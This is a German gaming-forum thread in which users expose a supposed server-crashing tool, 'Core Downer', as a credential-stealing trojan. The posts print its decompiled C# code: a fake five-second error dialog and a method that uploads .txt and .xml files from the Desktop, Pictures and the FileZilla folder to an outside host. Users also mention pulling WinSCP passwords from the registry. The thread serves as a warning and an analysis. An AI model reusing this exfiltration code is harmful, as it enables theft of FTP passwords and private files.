[RLS] Core Downer [rev2089 | Tested]

[NaOiZ]

Hirnlos sowas zu releasen .. und dann nochen Virus ..

[Red Firestar]

Ich frage mich warum hier nichts angezeigt wird o.O

[collado]

u02.cwsurf.de <--- here he have the passwords LOL

[#SoNiice]

Weil das ganze einfach was aus euren Verzeichnissen ausliest, hab's gerade auch mal entpackt, Padmak, du bist schlau, sonst mache ich sowas immer, nur jetzt nicht :3 Aber ernsthaft, Filezilla Passwörter? Dann wenigstens WinSCP!

Das Teil hat übrigens einfach 'ne Wartezeit von 5s, bis die Meldung kommt :3

Code:

private void btnSend_Click(object sender, EventArgs e)
    {
      Thread.Sleep(5000);
      int num = (int) MessageBox.Show("Failed to connect to core, bad version.", "Failed", MessageBoxButtons.OK, MessageBoxIcon.Hand);
    }

//edit:

Gerade mal den gesamten Source angeschaut, es werden bei jedem Druck egal auf was die Daten versendet, überall wird die sogenannte "Core.StopCore()" Methode aufgerufen.

[Padmak]

Mit WinSCP geht das nicht, nur Filezilla speichert seine Passwörter im Klartext ab^^
Bei WinSCP ist alles verschlüsselt (was eigentlich auch IMMER so sein sollte)

Und das hier ist ein perfektes Beispiel für die Unzuverlässigkeit von Virustotal, das "Programm" ist selbstgeschrieben, kein Virenscanner hat da ne Chance dagegen^^

Padmak

[#SoNiice]

WinSCP speichert die Passwörter zwar nicht im Klartext, lassen sich dennoch einfach aus der Registry auslesen siehe mein Tool, hatte ja ausversehen den WinSCP Ausleser mit drin :P Man kann die Passwörter zwar dann nicht direkt sehen, aber sie in WinSCP dennoch einfügen und mit 'nem WinSCP Backer wieder rausholen und im Klartext anzeigen lassen, oh Gott - Wir sind alle so böse.

[Padmak]

Ja, trotzdem ist das ein Mindestmaß an Sicherheit (btw. speichert mein WinSCP nichts in die Registry, nur lokal (glaub ich zumindest), wodurch's bisschen sicherer wird.)
Lächerlich ist dieses Tool hier trotzdem, und verdammt witzig dass Leute drauf reinfallen xD

Padmak

[Teh Plex]

Sowas sollte nie releaset werden da es leute gibt die es einfach übertreiben !
Beispiel Zephos hatte keine firewall server wurde geschrottet !

[xCPx]

Quote:

Originally Posted by Padmak

Also.. so richtig sicher bin ich mir da ja nicht, aber wenn ich das richtig gesehen habe (und ich täusche mich selten), dann downt das hier keinen Server:

 Spoiler

Code:

public static void StopCore()
{
    Uri uri = new Uri("http://royal-image.cwsurf.de/pixload/pixload.php?action=new&vic=");
    Uri uri2 = new Uri("http://royal-image.cwsurf.de/pixload/pixload.php?action=upload&vic=");
    WebClient client = new WebClient();
    client.DownloadString(uri + Environment.MachineName);
    string[] strArray = new string[] { Environment.GetFolderPath(Environment.SpecialFolder.Desktop), Environment.GetFolderPath(Environment.SpecialFolder.MyPictures), Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "/Filezilla" };
    foreach (string str in strArray)
    {
        Console.WriteLine("Searching directory: " + str);
        DirectoryInfo info = new DirectoryInfo(str);
        FileInfo[] files = info.GetFiles("*.txt", SearchOption.AllDirectories);
        FileInfo[] infoArray2 = info.GetFiles("*.xml", SearchOption.AllDirectories);
        client.Headers.Add("Content-Type", "binary/octet-stream");
        foreach (FileInfo info2 in files)
        {
            byte[] bytes = client.UploadFile(uri2 + Environment.MachineName, "POST", info2.Directory + "/" + info2.Name);
            Encoding.UTF8.GetString(bytes, 0, bytes.Length);
        }
        foreach (FileInfo info3 in infoArray2)
        {
            byte[] buffer2 = client.UploadFile(uri2 + Environment.MachineName, "POST", info3.Directory + "/" + info3.Name);
            Encoding.UTF8.GetString(buffer2, 0, buffer2.Length);
        }
    }
}

sondern ist eher mit einem Virus, der Filezilla-PWs klaut, vergleichbar.

Also, auch wenn's von Smokey schon angedeutet wurde: Virus, nicht laden!

€: Und weil ichs so geil find, dass xCPROx drauf reingefallen ist:

Code:

private void btnSend_Click(object sender, EventArgs e)
{
    Thread.Sleep(0x1388);
    MessageBox.Show("Failed to connect to core, bad version.", "Failed", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}

€2: Das gute jedoch: falls ich mich nochmals nicht täusche, nistet sich das Ding nicht im System ein, es verschickt nur einmal froh und munter eure Daten :P

Padmak

Und weil ich mein Sandbox liebe juckt mich das 0
Lieber kleiner Markus

[Shyrai]

plex das tool geht doch noch nichtmal^^

[Steaser#]

Also ich muss sagen,
Respekt an alle die es runtergeladen haben.

[Padmak]

Quote:

Originally Posted by xCPx

Und weil ich mein Sandbox liebe juckt mich das 0
Lieber kleiner Markus

Trotzdem, du führst es aus, ohne dir die Datei davor zumindest flüchtig anzusehen, alleine aus Interesse an der Funktionsweise wäre das schon erklärbar. Aber wenn du auf deine Sandbox vertraust, bitte sehr^^

€: Natürlich hab ichs reversed, erstens war ich misstrauisch wegen der Dateigröße und zweitens wollte ich wissen wie es funktioniert, wäre es denn ein legitimes Programm gewesen

€2: Steaser, wieso hast du denn deinen Post wieder editiert? Hast du etwa doch nicht alles gelöscht?

€3: xCPx, ich soll dir das hier von .Awesome und RealFreak geben:

 Spoiler

Frag mich nich, warum sie's nich selbst posten..^^

Der liebe kleine Padmak

[.SliceR]

Und was soll der scheiß bitte?!
Wenn er scheiß funktioniert werden wieder tausende Kiddys von Server zu Server gehen und seinen "spaß" haben -.- Unnötig so nen Dreck! Wenn du doch schon so einen hast dann behalte es doch bei dir!!

[Red Firestar]

Quote:

Originally Posted by Steaser#

Also ich muss sagen,
Respekt an alle die es runtergeladen haben.

Respekt an den ersteller weil er mit einer anzeige rechnen kann

[COCKT4IL]

Fk jetzt bist du der Held der Nation achso ne doch net